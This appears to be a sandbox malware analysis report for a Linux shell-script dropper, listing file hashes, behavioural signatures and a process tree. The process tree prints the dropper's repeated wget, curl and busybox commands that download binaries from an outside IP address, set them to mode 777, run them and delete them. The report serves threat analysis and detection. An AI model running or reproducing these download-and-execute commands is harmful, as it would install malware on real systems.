Analysis
-
max time kernel
36s -
max time network
37s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21-11-2024 08:36
Static task
static1
Behavioral task
behavioral1
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh
-
Size
10KB
-
MD5
8abf2434594ba2dffa54b25832749b54
-
SHA1
0e89289d57c7377b331a82fbfaca526ccd8bb78e
-
SHA256
d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c
-
SHA512
02c0ada458d3f0b7d057957c42ac1ed0493daa06e48ff877c07a7120a3cd5a5e88dc2ba46a95cc6c2752b8f570c19a697220bc733f2c8653c42d770e7aa033a1
-
SSDEEP
96:KVh5RKWVHduuHsnbBWwwiDcO0UCn14IuuHsnbRWwwiDqOVvhkEy1n44h5RKWVRNs:KxL8a1DrE
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 20 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 783 chmod 815 chmod 856 chmod 735 chmod 771 chmod 829 chmod 672 chmod 791 chmod 797 chmod 809 chmod 821 chmod 835 chmod 765 chmod 777 chmod 803 chmod 844 chmod 850 chmod 862 chmod 868 chmod 759 chmod -
Executes dropped EXE 20 IoCs
Processes:
OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oCpstocrnn33XyZPJSPVD6DADzQDT0PtgRbC6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hWk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQQp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON50U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4CiV8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKXBU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOilPO3tXEHa3zKtcSh7sDc20GioPz4Cc1OzffQp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON50U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4CiV8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKXBU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZioc pid Process /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 673 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC 737 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC 760 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 766 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW 772 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 778 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 784 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 792 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 798 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 804 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 810 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 816 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil 822 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff 830 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 836 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 845 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci 851 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 857 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX 863 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ 869 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ -
Checks CPU configuration 1 TTPs 20 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxk9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQrmwgetcurlpid Process 776 busybox 778 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ 779 rm 774 wget 775 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff curl File opened for modification /tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5 curl File opened for modification /tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci curl File opened for modification /tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4 curl File opened for modification /tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC curl File opened for modification /tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ curl File opened for modification /tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1 curl File opened for modification /tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX curl File opened for modification /tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ curl File opened for modification /tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC curl File opened for modification /tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3 curl File opened for modification /tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW curl
Processes
-
/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh/tmp/d0608027612530b7b92c2a364ea4fb6a1ac1368554d6ee89c698b7f90164a19c.sh1⤵PID:639
-
/bin/rm/bin/rm bins.sh2⤵PID:641
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:643
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:669
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:671
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:672
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:673
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:674
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:675
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:717
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:738
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:739
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:758
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:761
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:762
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:764
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:766
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:767
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:768
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:770
-
-
/bin/chmodchmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:773
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:774
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:776
-
-
/bin/chmodchmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:778
-
-
/bin/rmrm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:779
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:780
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:781
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:782
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:783
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:784
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:785
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:786
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:790
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:793
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:794
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:796
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:799
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:800
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:802
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:805
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:806
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:808
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX./zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:811
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:812
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:814
-
-
/bin/chmodchmod 777 BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ./BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm BU4l05sQ3gsRmPNuE6mA9HZoB7YnePpOpZ2⤵PID:817
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:818
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:820
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:823
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:824
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:826
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:831
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:832
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:834
-
-
/bin/chmodchmod 777 Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON5./Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm Qp7BZGsT9AmrTaw8AtvnSwxIEHLzVvJON52⤵PID:837
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:838
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:840
-
-
/bin/chmodchmod 777 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD1./0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm 0U57HIbicjQS6CEahNnQCVxR5zIiOs0kD12⤵PID:846
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:847
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:849
-
-
/bin/chmodchmod 777 Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci./Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm Pa2N4eS5iCJ3SPgv6Rpy06gjPkzA5Ca4Ci2⤵PID:852
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:853
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:854
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:855
-
-
/bin/chmodchmod 777 V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo463./V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm V8HRD2LeEMFO4i6jf2zKMyySYyjZOCo4632⤵PID:858
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:859
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:860
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵PID:861
-
-
/bin/chmodchmod 777 zxXXgK6Ajr5hc3bvEH80FOHJiu8fqfKNKX2⤵
- File and Directory Permissions Modification
PID:862
-
-
